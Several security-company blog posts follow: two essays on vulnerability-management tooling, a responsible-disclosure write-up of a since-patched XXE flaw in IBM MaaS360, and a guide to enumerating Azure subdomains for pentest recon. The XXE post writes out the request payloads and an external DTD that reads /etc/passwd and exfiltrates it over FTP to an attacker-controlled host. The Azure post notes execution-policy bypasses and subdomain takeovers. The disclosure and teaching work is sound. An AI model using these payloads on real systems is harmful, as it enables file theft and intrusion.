Back

Data Silos: Are They Really a Problem?

Data silos happen naturally for many reasons. As an organization grows and their security maturity evolves, they’ll likely end up with one or more of these scenarios.

Using multiple security testing scanners: As the security landscape evolves, so does the need for security testing tools, including SAST and DAST/IAST tools, network perimeter tools, internal or third-party penetration testing, and adversarial attack simulation. Companies that were once functioning with one SAST, DAST and network tool each will begin to add others to the toolkit, possibly along with additional pentesting companies and ticketing and/or GRC platforms.

Tracking remediation across multiple tools: One business unit’s development team could be on a single instance of JIRA, for example, while another business unit is using a separate instance, or even using a completely different ticketing system.

What Problems Do Data Silos Create in a Security Testing Environment?

Data silos can create several problems in a security testing environment. Two common challenges we see are duplicate vulnerabilities and false positives.

Let’s take a look at each one:

Duplicate vulnerabilities: This happens so easily. You’re using a SAST and a DAST tool for scanners. Your SAST and DAST tools both report an XSS vulnerability on the same asset, so your team receives multiples tickets for the same issue. Or, let’s say you run a perimeter scan and PCI penetration test on the same IP range as your vulnerability management team. Both report the same missing patch, and your organization receives duplicate tickets for remediation. If this only happened once, no big deal. But when scaled to multiple sites and thousands of vulnerabilities identified, duplicate vulnerabilities create significant excess labor for already busy remediation teams. The result: contention across departments and slower remediation.

False positives: False positives create extra work, can cause teams to feel they’re chasing ghosts, and reduce confidence in security testing reports. Couple them with duplicate vulnerabilities, and the problems multiply. For example, say your security team reports a vulnerability from their SAST tool. The development team researches it and provides verification information as to why this vulnerability is a false positive. The security team marks it as a false positive, and everyone moves on. Then your security team runs their DAST tool. The same vulnerability is found and reported to the development team who then does the same research and provides the same information as to why this same vulnerability is still a false positive. Now you have extra work as well as the possibility of animosity between security and development teams.

Why Do These Problems Happen—And How Can You Stop It?

The answer that many security scanners offer is a walled garden solution, or closed platforms. In other words, these security tools cannot ingest vulnerabilities outside of their solution suite. This approach may benefit the security solution vendor, but it hamstrings your security teams. Organizations reliant on these platforms are unable to select among best-in-breed security tools for specific purposes, or they risk losing a single, coherent view of their vulnerabilities enterprise wide.

NetSPI recommends finding a vulnerability orchestration platform provider that can ensure choice while still delivering a single source of record for all vulnerabilities. Using a platform that can automatically aggregate, normalize, correlate and prioritize vulnerabilities allows organizations to retain the agility to test emerging technologies using commercially owned, open source, or even home-grown security tools. Not only will this minimize the challenges caused by data silos, but it can allow security teams to get more testing done, more quickly.

When we built NetSPI Resolve™, our own vulnerability orchestration platform, we built it to eliminate walled gardens. The development of the platform began almost twenty years ago and is the first commercially available security testing automation and vulnerability correlation software platform that empowers you to reduce the time required to identify and remediate vulnerabilities. As a technology-enabled service provider, we didn’t want to limit our testers to specific tools. NetSPI Resolve empowers our testers to choose the best tools and technology. More than that, because NetSPI Resolve can ingest and integrate data from multiple tools, it also provides our testers with comprehensive, automated reporting, ticketing, and SLA management. By reducing or eliminating the time for these kinds of tasks,

NetSPI Resolve allowed testers to do what they do best – test.

Data silos aren’t inevitable, but they are common. Knocking them down will go a long way towards reducing your organization’s cybersecurity risk posture by decreasing your overall time to remediate.

Learn more about vulnerability orchestration and NetSPI Resolve:

Back

XXE in IBM's MaaS360 Platform

A couple of months ago I had the opportunity to test an implementation of MaaS360 – IBM’s MDM solution. The test was focused on device controls and the protection of corporate data, all things which the client had configured and none of which will be talked about here. Instead, during the course of the test I stumbled upon an External XML Entity (XXE) vulnerability in one of the services used to deliver MaaS360 functionality to IBM clients. Details of the issue and its discovery are the focus of this blog.

XXE?

First, a lightning fast breakdown of eXtensible Markup Language (XML) and XXE:

XML is a flexible markup language capable of defining instructions for processing itself in a special section called the Document Type Definition (DTD). Within the DTD, ‘XML entities’ can be defined that tell the XML processor to replace certain pieces of text within the document with other values during parsing. As you’ll see below, if you can define a DTD as part of the XML payload that you provide to a service, you can potentially change the way the parser interprets the document.

XXE is a vulnerability in which an XML parser evaluates attacker-defined external XML entities. Traditional (non-external) XML entities are special sequences in an XML document that tell the parser the entire ‘entity’ should be replaced with some other text during document parsing. This can be used to allow characters that would otherwise be interpreted as XML meta-characters to be represented in the document, or to re-use common text in many places while only having to update a single location. Common XML entities supported by all parsers include ‘&gt;’ and ‘&lt;’ – during processing, these entities are replaced with the strings ‘>’ and ‘<‘, respectively. To define a regular, non-external entity, in the DTD you include the following:

<!ENTITY regular_entity "I am replacement text">

Within the XML document, then, if you had the string:

<dataTag>This is an entity: &regular_entity;</dataTag>

That string during processing would be changed to:

<dataTag>This is an entity: I am replacement text</dataTag>

External XML entities behave similarly, but their replacement values aren’t limited to text. With an external XML entity, you can provide a URL that defines an external resource that contains the text you want to be inserted. In this case, ‘external’ refers to the fact that the resource isn’t included within the document itself, and means the parser will have to access a separate resource in order to resolve the entity. To differentiate between a regular entity (whose replacement text is contained within the document) and an external entity (whose text is external to the document), the keywords ‘SYSTEM’ or ‘PUBLIC’ are included as part of the entity definition. To define an external entity in the DTD, you include the following:

<!ENTITY external_entity SYSTEM 'file:///etc/passwd'>

Within the XML document, any instance of the entity will be replaced. For example:

<dataTag>This is the password file: &external_entity;</dataTag>

will be transformed into:

<dataTag>This is the password file: root:x:0:0:root:/root:/bin/bash [...]</dataTag>

As you can see, if you can trick a parser into evaluating arbitrary external XML entities, you can gain access to the local filesystem.

The Issue

With the basics out of the way, let’s take a look at functionality in IBM’s MaaS360 that was vulnerable to this type of issue. API functionality wasn’t an area of focus during this test, however, there were a couple places where configuration information was pulled down from MaaS360 servers – I decided to take a quick peek into these to see if I could trick the mobile client into configuring itself improperly. That lead nowhere, but I did identify a handful of requests that were submitting XML payloads in POST requests.

Every request I looked at was being properly parsed and validated. Inline DTDs I added were being ignored and malformed XML documents were being properly rejected – every request with an XML payload seemed to be subject to the same validation standards. Oh well, it was a longshot.

And then, the last request I looked at had this:

POST /ios-mdm/ios-mdm-action.htm HTTP/1.1
Host: services.m3.maas360.com
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: [REDACTED]
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Length: 392

RP_REQUEST_TYPE=ACTIONS_RESPONSE_REQUEST&RP_CSN=[REDACTED]&RP_SEC_KEY=[REDACTED]&RP_DATA=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CActionResults%3E%3CActionResult%20ID%3D%22%22%20type%3D%2213%22%3E%3Cparam%20name%3D%22status%22%3ESuccess%3C%2Fparam%3E%3C%2FActionResult%3E%3C%2FActionResults%3E%0A&RP_BILLING_ID=[REDACTED]&RP_PLATFORM_ID=[REDACTED]&RP_REQUEST_VERSION=[REDACTED]

Hmm. An XML payload, but URL-encoded and passed as the value of a x-www-form-urlencoded parameter. That’s interesting. They probably have to parse this differently than they parse their XML-only payloads. What if I…

POST /ios-mdm/ios-mdm-action.htm HTTP/1.1
Host: services.m3.maas360.com
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: [REDACTED]
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Length: 468

RP_REQUEST_TYPE=ACTIONS_RESPONSE_REQUEST&RP_CSN=[REDACTED]&RP_SEC_KEY=[REDACTED]&RP_DATA=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CDOCTYPE+foo+SYSTEM+'https://6mtgnrnugo50ggqjccizibkrui09oy.netspi-collaborator.com'%3E%3CActionResults%3E%3CActionResult%20ID%3D%22%22%20type%3D%2213%22%3E%3Cparam%20name%3D%22status%22%3ESuccess%3C%2Fparam%3E%3C%2FActionResult%3E%3C%2FActionResults%3E%0A&RP_BILLING_ID=[REDACTED]

Note the above URL-encoded external entity that references https://6mtgnrnugo50ggqjccizibkrui09oy.netspi-collaborator.com – this is a Burp Collaborator URL. There was a delay, and then the application responded with a blank ‘HTTP 200’. Looking over at my Collaborator instance showed:

Collab

A DNS query, then an HTTP request to retrieve the resource I had injected! Not only did I have XXE, I also had unrestricted outbound access to help with exfiltration. The outbound access was key, in this case – as mentioned previously, the HTTP response to successful XXE processing was an ‘HTTP 200’ with an empty body, which is worthless for data exfiltration.

To take advantage of the unrestricted outbound access, I injected a DTD that referenced an additional DTD hosted on a server I controlled. This allowed me to define parameter entities that would be evaluated during the parsing of the XML document without requiring me to modify the existing (valid) document structure.

POST /ios-mdm/ios-mdm-action.htm HTTP/1.1
Host: services.m3.maas360.com
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: MaaS360-MaaS360-iOS/3.50.83
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Length: 452

RP_REQUEST_TYPE=ACTIONS_RESPONSE_REQUEST&RP_CSN=[REDACTED]&RP_SEC_KEY=[REDACTED]&RP_DATA=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE+foo+SYSTEM+'https://192.0.2.1/xxe.dtd'%3E%3CActionResults%3E%3CActionResult%20ID%3D%22%22%20type%3D%2213%22%3E%3Cparam%20name%3D%22status%22%3ESuccess%3C%2Fparam%3E%3C%2FActionResult%3E%3C%2FActionResults%3E%0A&RP_BILLING_ID=[REDACTED]&RP_PLATFORM_ID=3&RP_REQUEST_VERSION=1.0

In the request above, ‘https://192.0.2.1/xxe.dtd’ is a reference to the below DTD, hosted on a server I controlled:

<!ENTITY % all SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY % external SYSTEM 'ftp://192.0.2.1:443/%all;'>">%param1;%external;

To go through the parsing step-by-step:

1. POST request (with inline DTD referencing an external DTD) submitted to server
2. Server receives XML payload and starts parsing inline Document Type Definition (DTD)
3. Inline DTD references an external DTD, so the server retrieves the external DTD to continue parsing
4. Parsing the external DTD results in the creation of multiple parameter entities that contain our exfiltration payload and exfiltration endpoint
5. The final parsing of the (internal + external) DTD results in the FTP connection to the exfiltration server, which contains our exfiltrated data as part of the URL
6. As long as we have a ‘fake’ FTP service listening on our FTP server, we should be able to catch the exfiltrated data sent in step #5

The result of using the above to read the file ‘/etc/passwd’ is shown below:

root@pentest:~/# ruby server.rb
New client connected
USER anonymous
PASS Java1.8.0_161@
TYPE I
/root:x:0:0:root:
/root:
/bin
QUIT

You’ll notice that’s the first line of a typical /etc/passwd file, albeit split across multiple lines. Since I was clearly able to exfiltrate data, it was time to stop verifying the issue and notify IBM of the finding.

Conclusion

Some key takeaways from this:

1. XML is a dangerous data format that’s easy to handle incorrectly. If you see it, get excited.
2. If you’re looking into something and you feel like every parameter you test isn’t vulnerable, keep checking – it was the last request I checked that was vulnerable.

Disclosure Timeline

May 11, 2018: Vulnerability discovered, details sent to IBM
May 11, 2018: Response from IBM acknowledging report and containing advisory number for tracking
May 18, 2018: Email and response from IBM regarding status
June 8, 2018: Email regarding status. IBM response indicates issue confirmed and fix almost complete
June 22, 2018: Email regarding status. IBM response indicates issue was patched June 9, 2018
July 18-20, 2018: Email regarding blog release. IBM responds that blog is fine, indicates PSIRT acknowledgment page has been updated
October 2018: Blog published

Back

Recurring Vulnerability Management Challenges That Can't Be Ignored

Stories of new data breaches grab headlines again and again. Many of these breaches are the result of known vulnerabilities left un-remediated, and in some cases, organizations have been aware of these vulnerabilities for years. Why weren’t these problems fixed sooner? Wouldn’t organizations try to fix them as soon as possible to avoid a breach?

Every organization strives to fix vulnerabilities rapidly. Unfortunately, fixing vulnerabilities is a complex task.

First, organizations are flooded with vulnerabilities. New vulnerabilities are reported daily and the volume is only increasing. Keeping pace is tough.

Second, there’s no single pane of glass for tracking all vulnerabilities. Organizations use multiple scanners to detect vulnerabilities, each living in its own walled garden. Application and network vulnerabilities are treated separately, typically in disconnected systems. Vulnerabilities discovered via pentesting may only reside in reports. Detective control tests find weaknesses in security tools, and auditing tools find vulnerabilities in configurations – and these results may not align with scan results. Unifying multiple sources in a central location, and normalizing the results for accurate tracking, is a big challenge.

Third, even if you have all vulnerabilities in a single pane, remediation processes vary and take time. Application vulnerabilities must go through the software development life cycle (SDLC), while network vulnerabilities have their own workflow. Identifying the right asset owner can be a challenge because CMDB information is often inaccurate. Configuration changes usually need to go through a change control board process, and patches need to be widely deployed across a large number of devices. There is little margin for error: fixing 99% of your vulnerabilities is great, but all it takes is that last 1% to cause a major breach.

On average, for every vulnerability patched, organizations lose 12 days coordinating across multiple teams. Contributing factors include:

  • Use of emails and spreadsheets to manage patching processes (57%)
  • No common view of systems and applications to be patched (73%)
  • No easy way to track if patching occurs in a timely manner (62%)

Fourth, many security organizations spend an inordinate amount of time focused on regulatory compliance. It’s critically important for your organization to build a strong, business-aligned security program that meets regulatory compliance standards. When a program is built to simply “check the box” of compliance, the results are inefficient, insecure, and not aligned with the business.

Finally, and most importantly, sheer human effort is not enough to overcome the vulnerability challenge because organizations don’t have enough talent or resources. A solid vulnerability management program requires talent focused on security, development, and operations – three skill-sets that are in high demand. Cybersecurity is experiencing negative unemployment; IT operations is fully occupied maintaining up-time; and developers are immersed in the agile SDLC.

We see common challenges in organizations of all sizes and across many industries. In the coming articles in this series, we’ll share our experiences and provide suggestions on how you can solve these challenges!

Back

Anonymously Enumerating Azure Services

Microsoft makes use of a number of different domains/subdomains for each of their Azure services. We’ve previously covered some of these domains in a post about using trusted Azure domains for red team activities, but this time we’re going to focus on finding existing Azure subdomains as part of the recon process. Also building off of another previous post, where we talked about enumerating Azure storage accounts and public blob files, the script included in this post will do DNS brute forcing to find existing Azure services subdomains.

So why do we want to do this? Let’s say that we’re doing a pen test against a company (TEST_COMPANY). As part of the recon process, we would want to see if TEST_COMPANY uses any Azure services. If we can confirm a DNS host name for TEST_COMPANY.azurewebsites.net, there’s a pretty good chance that there’s a TEST_COMPANY website hosted on that Azure host. We can follow a similar process to find additional public facing services for the rest of the domains listed below.

Domains / Associated Services

Here’s a list of Azure-related domains that I’ve identified:

DomainAssociated Service
azurewebsites.netApp Services
scm.azurewebsites.netApp Services – Management
p.azurewebsites.netApp Services
cloudapp.netApp Services
file.core.windows.netStorage Accounts-Files
blob.core.windows.netStorage Accounts-Blobs
queue.core.windows.netStorage Accounts-Queues
table.core.windows.netStorage Accounts-Tables
redis.cache.windows.netDatabases-Redis
documents.azure.comDatabases-Cosmos DB
database.windows.netDatabases-MSSQL
vault.azure.netKey Vaults
onmicrosoft.comMicrosoft Hosted Domain
mail.protection.outlook.comEmail
sharepoint.comSharePoint
azureedge.netCDN
search.windows.netSearch Appliance
azure-api.netAPI Services

Note: I tried to get all of the Azure subdomains into this script but there’s a chance that I missed a few. Feel free to add an issue to the repo to let me know if I missed any important ones.

The script for doing the subdomain enumeration relies on finding DNS records for permutations on a base word. In the example below, we used test12345678 as the base word and found a few matches. If you cut the base word to “test123”, you will find a significant number of matches (azuretest123, customertest123, dnstest123) with the permutations. While not every Azure service is going to contain the keywords of your client or application name, we do frequently run into services that share names with their owners.

Github/Code Info

The script is part of the MicroBurst GitHub repo and it makes use of the same permutations file (Misc/permutations.txt) from the blob enumeration script.

Usage Example

The usage of this tool is pretty simple.

  • Download the code from GitHub – https://github.com/NetSPI/MicroBurst
  • Load up the module
    • Import-Module .Invoke-EnumerateAzureSubDomains.ps1
    • or load the script file into the PowerShell ISE and hit F5

Example Command:

Invoke-EnumerateAzureSubDomains -Base test12345678 -Verbose

Enumsubdomains

If you’re having issues with the PowerShell execution policy, I still have it on good authority that there’s at least 15 different ways that you can bypass the policy.

Practical Use Cases

The following are a couple of practical use cases for dealing with some of the subdomains that you may find.

App Services – (azure-api.net, cloudapp.net, azurewebsites.net)
As we noted in the first section, the azurewebsites.net domains can indicate existing Azure hosted websites. While most of these will be standard/existing websites, you may get lucky and run into a dev site, or a pre-production site that was not meant to be exposed to the internet. Here, you may have luck finding application security issues, or sensitive information that is not supposed to be internet facing.

It is worth noting that the scm subdomains (test12345678.scm.azurewebsites.net) are for site management, and you should not be able to access those without proper authorization. I don’t think it’s possible to misconfigure the scm subdomains for public access, but you never know.

Storage Accounts – (file, blob, queue, table.core.windows.net)
Take a look at this previous post and use the same keywords that you find with the subdomain enumeration to see if the discovered storage accounts have public file listings.

Email/SharePoint/Hosted Domain – (onmicrosoft.com, mail.protection.outlook.com, sharepoint.com)
This one is pretty straightforward, but if a company is using Microsoft for email filtering, SharePoint, or if they have a domain that is registered with “onmicrosoft.com”, there’s a strong indication that they’ve at least started to get a presence in Azure/Office365.

Databases (database.windows.net, documents.azure.com, redis.cache.windows.net)
Although it’s unlikely, there is a chance that Azure database services are publicly exposed, and that there are default credentials on the databases that you find on Azure. Additionally, someone would need to be pretty friendly with their allowed inbound IPs to allow all IPs access to the database, but crazier things have happened.

Azuresqlfw

Subdomain Takeovers
It may take a while to pay off, but enumerating existing Azure subdomains may be handy for anyone looking to do subdomain takeovers. Subdomain takeovers are usually done the other way around (finding a domain that’s no longer registered/in use), but by finding the domains now, and keeping tabs on them for later, you may be able to monitor for potential subdomain takeovers. While testing this script, I found that there’s already a few people out there squatting on some existing subdomains (amazon.azurewebsites.net).

Wrap Up

Hopefully this is useful for recon activities for Azure pen testing. Since this active method is not perfect, make sure that you’re keeping an eye out for the domains listed above while you’re doing more passive recon activities. Feel free to let me know in the comments (or via a pull request) if you have any additional Azure/Microsoft domains that should be added to the list.

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.

X